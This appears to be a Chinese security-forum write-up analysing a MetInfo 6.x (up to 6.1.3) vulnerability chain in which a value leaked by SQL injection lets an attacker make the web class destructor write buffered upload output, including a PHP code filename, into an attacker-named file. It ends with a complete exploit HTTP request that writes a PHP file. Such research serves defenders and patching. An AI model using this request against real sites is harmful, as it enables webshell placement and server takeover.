本漏洞需要结合前台SQL注入进行getshell。

漏洞分析

漏洞文件存在于 app/system/include/class/web.class.php 文件中,我们可以看到当满足条件:$_M['form']['metinfonow'] == $_M['config']['met_member_force'] 时, web 类的析构函数会将缓冲区的数据写入一个可控的文件中,其代码具体如下:

为了满足上面的条件,我们需要先看看 $_M['config']['met_member_force'] 是什么。通过搜索 met_member_force 关键字,我们可以发现其值的生成方式是通过 randStr 函数随机生成 7个 字符。具体代码如下:

针对 Metinfo6.x <= 6.1.2 的版本,我们可以利用已知的 SQL注入 漏洞(留言版处)获取 $_M['config']['met_member_force'] 的值,而 Metinfo6.1.3 的版本,也可以利用未修复的 SQL注入 漏洞(反馈处),具体漏洞细节可参考:Metinfo6.0.0-6.1.2前台注入漏洞生命线 。下图为通过注入获取 $_M['config']['met_member_force'] 的值:

接下来就是寻找 web 类的子类,因为他们都继承了父类的 __destruct 方法,我们只要找到可控制的缓冲区数据,便可完成整个攻击。通过全局搜索 extends web 关键字,我们发现有一个 uploadify 子类非常适合。该上传类不管上传操作成功与否,都会将相关信息输出(即可将数据送入缓冲区)。该类中有多个方法均可利用,我们随机选取一个 doupfile 方法来分析。

我们可以看到下图代码 第17行 直接将 $back 变量输出,我们跟进到 第15行 ,观察该变量值的来源。

从上图代码中,我们可以清晰的看到 $back 变量来源于可控的 $_M['form']['formname'] ,我们跟进对其处理的 upfile 类的 upload 方法,具体代码如下:

我们看到 第30行 代码,如果 $this->ext 类型不再数据库中,就将其返回,而如果我们将文件名设置为 <?php phpinfo();?> ,这样这段代码也会被输出到缓冲区中。接着回到我们文章开头的代码中,便可成功写入 shell

攻击

POST /metinfo/admin/index.php?c=uploadify&m=include&a=doupfile&lang=cn&metinfonow=qipwtxm&html_filename=1.php HTTP/1.1
Host: localhost
Content-Length: 196
Origin: http://localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8tQiXReYsQYXHadW
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XDEBUG_SESSION=PHPSTORM
Connection: close

------WebKitFormBoundary8tQiXReYsQYXHadW
Content-Disposition: form-data; name="test"; filename="<?php phpinfo();?>"
Content-Type: image/jpeg

test
------WebKitFormBoundary8tQiXReYsQYXHadW--

攻击流程图

最后我们再来理一下整个攻击的流程:

参考

【技术分析】Metinfo利用sql注入快速getshell

点击收藏 | 0 关注 | 1
登录 后跟帖